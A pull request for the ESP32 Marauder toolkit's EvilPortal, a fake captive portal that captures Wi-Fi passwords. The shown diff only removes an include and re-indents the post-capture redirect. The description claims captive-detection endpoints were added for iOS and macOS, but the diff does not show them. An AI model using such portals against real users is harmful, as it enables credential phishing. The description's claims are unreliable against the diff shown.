### PR TITLE
Added captive endpoints redirection to index.html file.

### DIFF
--- a/esp32_marauder/EvilPortal.cpp
+++ b/esp32_marauder/EvilPortal.cpp
@@ -1,4 +1,3 @@
-#include "HardwareSerial.h"
 #include "EvilPortal.h"
 
 #ifdef HAS_PSRAM
@@ -118,10 +117,9 @@ void EvilPortal::setupServer() {
       this->password = inputMessage;
       this->password_received = true;
     }
-    
     request->send(
-        200, "text/html",
-        "<html><head><script>setTimeout(() => { window.location.href ='/' }, 100);</script></head><body></body></html>");
+      200, "text/html",
+      "<html><head><script>setTimeout(() => { window.location.href ='/' }, 100);</script></head><body></body></html>");
   });
   Serial.println("web server up");
 }


### PR DESCRIPTION
**iOS** and **macOS** users were experiencing issues with the captive portal not showing up. This has now been resolved with the recent updates to the **EvilPortal** class.

**Added:**
- captiveEndpoints array
- for loop to register handlers for the captive portal detection endpoints

